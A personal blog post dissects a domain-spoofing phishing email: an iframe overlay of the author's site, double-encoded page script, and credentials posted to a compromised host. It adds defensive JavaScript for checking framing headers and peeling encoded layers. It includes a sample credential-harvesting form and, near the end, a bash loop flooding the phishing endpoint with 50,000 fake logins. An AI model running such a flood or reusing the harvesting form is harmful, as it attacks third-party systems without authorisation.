f-log

just another web log

14 Sep 2024:
shocking jumpstation hacked-ish

Hacked-ish

Having had the jumpstation.co.uk domain since before 2000, I get a lot of spam and have seen most spam campaigns and techniques. This one today made me sit up and pay attention.

I am a professional(*) and open these links in Virtual Machines. DO NOT TRY THIS AT HOME

Email source

Subject: Urgent! Email Removal Initiated!
Date: 13 Sep 2024 08:30:17 +0000
Reply-To: jumpstation.co.uk-Mailserver<noreply@jumpstation.co.uk>

Dear Email,

email@jumpstation.co.uk removal from server has been approved and initiated, Due to ignorance of last verification warning.

Removal will occur in exactly 48 hours from now 9/13/2024 8:30:17 a.m.

We recommend that you do any of the below and protect your mailbox and increase email security.

Continue Removal

Cancel Removal

jumpstation.co.uk Webmail Support

The Continue Removal and Cancel Removal links go to the same place.

But kudos on using noreply @ jumpstation.co.uk as the Reply-To. That header is whatever the sender puts in it; nothing on the receiving side validates it.

The result of following that link was not what I expected.

My website HACKED !! (well, not really)

[Screenshot: jumpstation domain shown inside the scam page's iframe]

The URL shows gateway.lighthouse.storage but it is my site that is showing!

In the HTML source they just use an iframe to load my site and then add the modal over the top. That only works because the framed site does not stop it: a site that sends an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive forbidding it would render as a blank frame instead.
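Added example (not code from the original post): given the response headers a site sends, decide whether an unrelated origin could load it in an iframe the way the scam page loaded jumpstation.co.uk. It handles both X-Frame-Options and CSP frame-ancestors (which takes precedence when both are present). The header values and the origins used below are constructed for illustration; I have not checked what jumpstation.co.uk actually sends.

```javascript
// Decide whether pageOrigin, served with these response headers, can be
// framed by framerOrigin. Header values and origins are constructed here;
// nothing is fetched from the network.

function parseFrameAncestors(csp) {
  // Return the source list of the frame-ancestors directive, or null if absent.
  for (const directive of csp.split(";")) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0].toLowerCase() === "frame-ancestors") return parts.slice(1);
  }
  return null;
}

function hostMatches(pattern, host) {
  if (pattern === host) return true;
  if (pattern.startsWith("*.")) {
    const suffix = pattern.slice(1); // "*.example.com" -> ".example.com"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return false;
}

function sourceAllows(source, framerOrigin, pageOrigin) {
  const src = source.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return framerOrigin === pageOrigin;
  if (src === "*") return true;
  const framer = new URL(framerOrigin);
  // scheme-source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framer.protocol === src;
  // host-source: optional scheme, host (may start with "*."), optional port
  const m = src.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, hostPattern, port] = m;
  if (scheme && framer.protocol !== scheme + ":") return false;
  if (!hostMatches(hostPattern, framer.hostname)) return false;
  const framerPort = framer.port || (framer.protocol === "https:" ? "443" : "80");
  if (port && port !== "*" && port !== framerPort) return false;
  return true;
}

function canBeFramedBy(headers, framerOrigin, pageOrigin) {
  // Normalise header names so callers can pass them in any case.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // A frame-ancestors directive overrides X-Frame-Options in browsers that
  // support CSP, so it is consulted first.
  const csp = h["content-security-policy"];
  if (csp) {
    const sources = parseFrameAncestors(csp);
    if (sources) return sources.some((s) => sourceAllows(s, framerOrigin, pageOrigin));
  }
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framerOrigin === pageOrigin;
  return true; // no framing policy at all: any site can iframe this page
}

// Constructed sample: the attacker's gateway origin against the framed site.
const SCAM_FRAMER = "https://gateway.lighthouse.storage";
const FRAMED_SITE = "https://jumpstation.co.uk";
const NO_POLICY = {};
const DENY_ALL = { "X-Frame-Options": "DENY" };
const SELF_ONLY = { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'" };

console.log("no policy:", canBeFramedBy(NO_POLICY, SCAM_FRAMER, FRAMED_SITE));
console.log("XFO DENY:", canBeFramedBy(DENY_ALL, SCAM_FRAMER, FRAMED_SITE));
console.log("CSP self:", canBeFramedBy(SELF_ONLY, SCAM_FRAMER, FRAMED_SITE));
```

Run it against the real headers of any site you own (curl -I will show them) to see whether it could be reused as a backdrop the same way.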

What is especially interesting is the use of the JUMPSTATION name and the favicon. If I had not been paying attention, and this had gone to a work domain I had not used for a while, then it might have been genuinely convincing.

The favicon is not downloaded by the scammer's web server, converted and served as an image. No, Google has a service for that:

https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://jumpstation.co.uk&size=16

The domain

Many, many spam/scam emails I get have numerous redirects that bounce between compromised servers. This one just uses gateway.lighthouse.storage.

I followed the root domain and reported it through their contact-us form.

Conclusion

FYI the rendered scam web page is just one huge encoded string passed through document.write

document.write(unescape('%3C%53% ... '))

Which seems to decode to yet more encoded JavaScript. So... as soon as anti-malware tools catch up with double encoding, the scammers will switch to triple encoding??
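Added example (not the scam page's code, and not reproducing its encoded string): a small script that peels nested document.write(unescape('...')) layers one at a time until plain content remains, which is the first thing I would do with a page like this before reading any of it. The payload is constructed inline from a hypothetical inner HTML fragment so it runs offline; the real page's string is not included.

```javascript
// Peel document.write(unescape('...')) wrappers. The sample payload below is
// constructed here so the script runs offline; it is not the real scam page.

// Percent-encode every UTF-16 unit the way the legacy escape() does
// (%XX below 256, %uXXXX above), so the sample matches what the scam used
// without relying on the deprecated global.
function percentEncode(s) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    out += c < 256
      ? "%" + c.toString(16).toUpperCase().padStart(2, "0")
      : "%u" + c.toString(16).toUpperCase().padStart(4, "0");
  }
  return out;
}

// Inverse of percentEncode (and of unescape()), done in one pass so that a
// decoded "%" can never be re-interpreted as the start of another escape.
function percentDecode(s) {
  return s.replace(/%(u[0-9a-fA-F]{4}|[0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex.startsWith("u") ? hex.slice(1) : hex, 16))
  );
}

// Matches document.write(unescape('<escaped>')) with either quote style.
const WRITE_UNESCAPE = /document\.write\(\s*unescape\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/;

// Decode layer by layer. maxDepth guards against a payload that never
// bottoms out; the returned depth tells you how many wrappers were found.
function peelLayers(html, maxDepth = 10) {
  const layers = [html];
  let current = html;
  for (let depth = 0; depth < maxDepth; depth++) {
    const m = WRITE_UNESCAPE.exec(current);
    if (!m) break;
    current = percentDecode(m[2]);
    layers.push(current);
  }
  return { depth: layers.length - 1, final: current, layers };
}

// Build a doubly encoded sample (constructed; the form action is hypothetical).
function buildSample(inner) {
  const layer1 = `document.write(unescape('${percentEncode(inner)}'))`;
  return `<script>document.write(unescape('${percentEncode(layer1)}'))</script>`;
}

const SAMPLE_INNER =
  '<form method="post" action="https://phish.invalid/bomb.php">' +
  '<input name="email"><input name="password" type="password"></form>';
const SAMPLE_PAGE = buildSample(SAMPLE_INNER);

const result = peelLayers(SAMPLE_PAGE);
console.log(`peeled ${result.depth} layer(s)`);
console.log(result.final);
```

On a real page, read the file and pass its contents to peelLayers; if the innermost layer is still not readable the scammer has moved on to a different encoder and the regex needs a second pattern for it.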

Unsurprisingly, entering your password several times eventually redirects to jumpstation.co.uk.

The login data gets POSTed to https://huntanstongolfclub .com/icon/bomb.php but I was bored and didn't investigate any further...

But I did bomb the bomb :D

for i in {1..50000}; do curl "https://huntanstongolfclub .com/icon/bomb.php" --data-raw "email=donald@whitehouse .gov&password=chumpette";done

Sometimes I will take more effort in spamming the spammers with more difficult to filter data.

Professional?

(*) Well not a professional to do with scam/spam, but I am a professional of something.



Disclaimer: This page is by me for me, if you are not me then please be aware of the following
I am not responsible for anything that works or does not work including files and pages made available at www.jumpstation.co.uk I am also not responsible for any information(or what you or others do with it) available at www.jumpstation.co.uk In fact I'm not responsible for anything ever, so there!